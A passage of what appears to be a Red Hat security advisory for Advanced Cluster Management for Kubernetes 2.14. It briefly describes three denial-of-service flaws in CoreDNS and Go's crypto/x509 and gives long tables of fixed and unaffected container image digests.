Known not affected
25 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Workaround
|
Threats
Impact
Important
A flaw was found in CoreDNS, a DNS server that chains plugins. A remote attacker can exploit this flaw by sending specially crafted DNS queries. This vulnerability exists in CoreDNS's loop detection plugin due to the use of a predictable pseudo-random number generator (PRNG) for generating a secret query name. Successful exploitation can lead to a denial of service (DoS) by crashing the DNS server.
7.5 (High)
Affected products
Fixed
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
25 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Workaround
|
Threats
Impact
Important
A flaw was found in the Go standard library packages `crypto/x509` and `crypto/tls`. During the process of building a certificate chain, an attacker can provide a large number of intermediate certificates. This excessive input is not properly limited, leading to an uncontrolled amount of work being performed. This can result in a denial of service (DoS) condition, making the affected system or application unavailable to legitimate users.
7.5 (High)
Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Vendor Fix
fix
|
Known not affected
29 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Threats
Impact
Important
A flaw was found in CoreDNS, a DNS server that chains plugins. A remote, unauthenticated attacker can exploit this vulnerability by repeatedly sending oversized DNS-over-HTTPS (DoH) GET requests. The GET path, unlike the POST path, lacks size validation before processing large `dns=` query parameter values. This can lead to high CPU usage, significant memory allocations, and increased garbage collection, resulting in a Denial of Service (DoS).
7.5 (High)
Affected products
Fixed
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
25 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Workaround
|
|
